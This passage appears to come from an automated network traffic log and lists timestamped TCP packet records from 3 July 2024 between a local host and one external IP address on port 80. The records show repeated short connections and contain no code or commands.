                                                                Jul 3, 2024 08:40:33.903908014 CEST804986677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:33.903956890 CEST4986680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:34.017925978 CEST4986680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:34.018237114 CEST4986780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:34.023103952 CEST804986777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:34.023178101 CEST4986780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:34.023210049 CEST804986677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:34.023250103 CEST4986680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:34.023444891 CEST4986780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:34.028983116 CEST804986777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:34.752324104 CEST804986777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:34.752511978 CEST4986780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:34.755279064 CEST4986780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:34.755661964 CEST4986880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:34.760354996 CEST804986777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:34.760443926 CEST804986877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:34.760528088 CEST4986780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:34.760657072 CEST4986880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:34.760967970 CEST4986880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:34.765721083 CEST804986877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:35.457936049 CEST804986877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:35.457998991 CEST4986880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:35.576980114 CEST4986880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:35.578109980 CEST4986980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:35.582139969 CEST804986877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:35.582191944 CEST4986880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:35.583009958 CEST804986977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:35.583066940 CEST4986980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:35.583806992 CEST4986980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:35.588622093 CEST804986977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:36.305280924 CEST804986977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:36.309077978 CEST4986980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:36.312030077 CEST4986980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:36.313302994 CEST4987080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:36.317130089 CEST804986977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:36.318161964 CEST804987077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:36.321075916 CEST4987080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:36.321077108 CEST4986980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:36.321340084 CEST4987080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:36.326163054 CEST804987077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:37.001458883 CEST804987077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:37.001533031 CEST4987080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:37.112576008 CEST4987080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:37.112576962 CEST4987180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:37.263504982 CEST804987177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:37.263631105 CEST4987180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:37.263686895 CEST804987077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:37.264986038 CEST4987180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:37.265058041 CEST4987080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:37.269838095 CEST804987177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:37.966768026 CEST804987177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:37.966828108 CEST4987180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:38.000051022 CEST4987180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:38.000422001 CEST4987280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:38.005585909 CEST804987177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:38.005609035 CEST804987277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:38.005631924 CEST4987180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:38.005680084 CEST4987280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:38.006036043 CEST4987280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:38.010785103 CEST804987277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:38.703145981 CEST804987277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:38.703474998 CEST4987280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:38.816997051 CEST4987280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:38.817037106 CEST4987380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:38.821964025 CEST804987377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:38.822225094 CEST804987277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:38.825135946 CEST4987280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:38.825153112 CEST4987380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:38.829000950 CEST4987380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:38.835954905 CEST804987377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:39.533375978 CEST804987377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:39.533440113 CEST4987380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:39.537453890 CEST4987380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:39.537926912 CEST4987480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:39.545252085 CEST804987377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:39.545301914 CEST4987380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:39.546097040 CEST804987477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:39.546226978 CEST4987480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:39.546828985 CEST4987480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:39.551721096 CEST804987477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:40.248943090 CEST804987477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:40.249031067 CEST4987480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:40.362569094 CEST4987480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:40.362974882 CEST4987580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:40.371613026 CEST804987577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:40.371942043 CEST804987477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:40.373075008 CEST4987580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:40.373095989 CEST4987480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:40.373298883 CEST4987580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:40.381269932 CEST804987577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:41.215760946 CEST804987577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:41.217104912 CEST4987580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:41.220299959 CEST4987580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:41.220312119 CEST4987680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:41.230602980 CEST804987677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:41.231105089 CEST804987577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:41.233063936 CEST4987580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:41.233115911 CEST4987680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:41.233365059 CEST4987680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:41.238919020 CEST804987677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:41.945683002 CEST804987677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:41.945772886 CEST4987680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:42.065704107 CEST4987680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:42.066056013 CEST4987780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:42.070954084 CEST804987777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:42.071013927 CEST4987780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:42.071300030 CEST4987780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:42.071305990 CEST804987677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:42.071393967 CEST4987680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:42.076282024 CEST804987777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:42.767271996 CEST804987777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:42.767682076 CEST4987780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:42.778299093 CEST4987780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:42.778681993 CEST4987880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:42.783557892 CEST804987877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:42.783643961 CEST4987880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:42.783798933 CEST804987777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:42.784007072 CEST4987780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:42.784265995 CEST4987880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:42.792038918 CEST804987877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:43.549927950 CEST804987877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:43.549982071 CEST4987880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:43.657979012 CEST4987880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:43.658279896 CEST4987980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:43.663122892 CEST804987977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:43.663218021 CEST4987980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:43.663383961 CEST4987980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:43.663417101 CEST804987877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:43.663477898 CEST4987880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:43.668148994 CEST804987977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:44.363472939 CEST804987977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:44.364504099 CEST4987980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:44.366611004 CEST4987980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:44.366908073 CEST4988080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:44.371750116 CEST804988077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:44.371764898 CEST804987977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:44.374418020 CEST4987980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:44.374418020 CEST4988080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:44.374670982 CEST4988080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:44.379473925 CEST804988077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:45.063502073 CEST804988077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:45.063576937 CEST4988080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:45.175043106 CEST4988080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:45.175041914 CEST4988180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:45.180011988 CEST804988177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:45.180354118 CEST804988077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:45.180437088 CEST4988080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:45.180444956 CEST4988180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:45.180691957 CEST4988180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:45.185540915 CEST804988177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:45.867364883 CEST804988177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:45.867427111 CEST4988180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:45.871527910 CEST4988180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:45.872004032 CEST4988280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:45.876750946 CEST804988177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:45.876804113 CEST4988180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:45.876872063 CEST804988277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:45.876934052 CEST4988280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:45.877331972 CEST4988280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:45.882359028 CEST804988277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:46.585947990 CEST804988277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:46.590015888 CEST4988280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:46.705108881 CEST4988280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:46.705439091 CEST4988380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:46.710422039 CEST804988377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:46.710673094 CEST4988380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:46.710913897 CEST4988380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:46.711018085 CEST804988277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:46.711133003 CEST4988280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:46.715823889 CEST804988377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:47.396589994 CEST804988377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:47.396658897 CEST4988380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:47.401129007 CEST4988380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:47.401568890 CEST4988480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:47.406357050 CEST804988377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:47.406394958 CEST4988380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:47.406429052 CEST804988477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:47.406498909 CEST4988480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:47.406815052 CEST4988480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:47.411693096 CEST804988477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:48.095602989 CEST804988477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:48.095663071 CEST4988480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:48.206037045 CEST4988480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:48.206387997 CEST4988580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:48.211227894 CEST804988577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:48.211430073 CEST804988477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:48.211456060 CEST4988580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:48.211472034 CEST4988480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:48.211632013 CEST4988580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:48.216434956 CEST804988577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:48.911603928 CEST804988577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:48.912115097 CEST4988580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:48.915095091 CEST4988680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:48.915095091 CEST4988580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:48.919958115 CEST804988677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:48.920089006 CEST4988680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:48.920378923 CEST4988680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:48.920397043 CEST804988577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:48.920506954 CEST4988580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:48.925168037 CEST804988677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:49.618062019 CEST804988677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:49.618120909 CEST4988680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:49.737689018 CEST4988680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:49.738019943 CEST4988780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:49.742921114 CEST804988777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:49.742996931 CEST4988780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:49.743062973 CEST804988677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:49.743129015 CEST4988680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:49.743316889 CEST4988780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:49.748083115 CEST804988777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:50.435343981 CEST804988777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:50.437047958 CEST4988780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:50.440057993 CEST4988780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:50.440061092 CEST4988880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:50.444922924 CEST804988877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:50.445025921 CEST4988880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:50.445221901 CEST4988880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:50.445460081 CEST804988777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:50.445664883 CEST4988780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:50.450001955 CEST804988877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:51.141403913 CEST804988877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:51.145107985 CEST4988880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:51.252315998 CEST4988880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:51.252612114 CEST4989080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:51.257405043 CEST804989077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:51.261112928 CEST4989080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:51.261332035 CEST804988877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:51.261364937 CEST4989080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:51.261405945 CEST4988880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:51.266455889 CEST804989077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:51.945595026 CEST804989077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:51.945704937 CEST4989080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:51.949887037 CEST4989080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:51.950340033 CEST4989180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:51.955262899 CEST804989177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:51.955328941 CEST4989180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:51.955468893 CEST4989180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:51.955511093 CEST804989077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:51.955562115 CEST4989080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:51.960339069 CEST804989177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:52.636207104 CEST804989177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:52.636291981 CEST4989180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:52.752309084 CEST4989180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:52.752325058 CEST4989280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:52.757380962 CEST804989277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:52.757510900 CEST4989280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:52.757603884 CEST804989177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:52.757643938 CEST4989280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:52.757729053 CEST4989180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:52.762379885 CEST804989277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:53.434462070 CEST804989277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:53.434544086 CEST4989280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:53.437695980 CEST4989280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:53.438044071 CEST4989380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:53.442764044 CEST804989277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:53.442821980 CEST4989280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:53.442858934 CEST804989377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:53.442964077 CEST4989380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:53.443068027 CEST4989380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:53.447832108 CEST804989377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:54.142510891 CEST804989377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:54.142582893 CEST4989380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:54.252835035 CEST4989380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:54.253204107 CEST4989480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:54.257910967 CEST804989377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:54.257973909 CEST4989380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:54.258037090 CEST804989477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:54.258104086 CEST4989480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:54.258332014 CEST4989480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:54.263104916 CEST804989477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:54.933331013 CEST804989477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:54.935229063 CEST4989480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:54.938358068 CEST4989480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:54.938380003 CEST4989580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:54.943269968 CEST804989577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:54.943557024 CEST804989477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:54.943650007 CEST4989480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:54.943665028 CEST4989580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:54.943799019 CEST4989580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:54.948576927 CEST804989577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:55.621666908 CEST804989577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:55.621741056 CEST4989580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:55.737267971 CEST4989580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:55.737692118 CEST4989680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:55.742598057 CEST804989577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:55.742631912 CEST804989677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:55.742645979 CEST4989580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:55.742686987 CEST4989680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:55.742907047 CEST4989680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:55.748090029 CEST804989677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:56.450417042 CEST804989677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:56.453763008 CEST4989680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:56.453763008 CEST4989680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:56.455243111 CEST4989780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:56.458916903 CEST804989677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:56.460113049 CEST804989777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:56.460141897 CEST4989680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:56.463289976 CEST4989780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:56.463289976 CEST4989780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:56.468261003 CEST804989777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:57.141083002 CEST804989777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:57.141376972 CEST4989780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:57.251909971 CEST4989780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:57.255068064 CEST4989880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:57.257589102 CEST804989777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:57.257878065 CEST4989780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:57.259984016 CEST804989877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:57.260159969 CEST4989880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:57.260236979 CEST4989880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:57.265038967 CEST804989877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:57.938334942 CEST804989877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:57.938404083 CEST4989880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:57.941889048 CEST4989880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:57.942295074 CEST4989980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:57.947227955 CEST804989977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:57.947283983 CEST4989980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:57.947514057 CEST4989980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:57.947622061 CEST804989877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:57.947666883 CEST4989880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:57.952328920 CEST804989977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:58.647171021 CEST804989977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:58.647275925 CEST4989980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:58.751935959 CEST4989980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:58.755134106 CEST4990080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:58.757153034 CEST804989977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:58.757622004 CEST4989980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:58.759958982 CEST804990077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:58.760179043 CEST4990080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:58.760303020 CEST4990080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:58.765110016 CEST804990077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:59.455344915 CEST804990077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:59.455441952 CEST4990080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:59.460041046 CEST4990080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:59.460398912 CEST4990180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:59.465142012 CEST804990077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:59.465192080 CEST4990080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:59.465219021 CEST804990177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:59.465275049 CEST4990180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:59.465686083 CEST4990180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:59.470508099 CEST804990177.91.77.82192.168.2.6
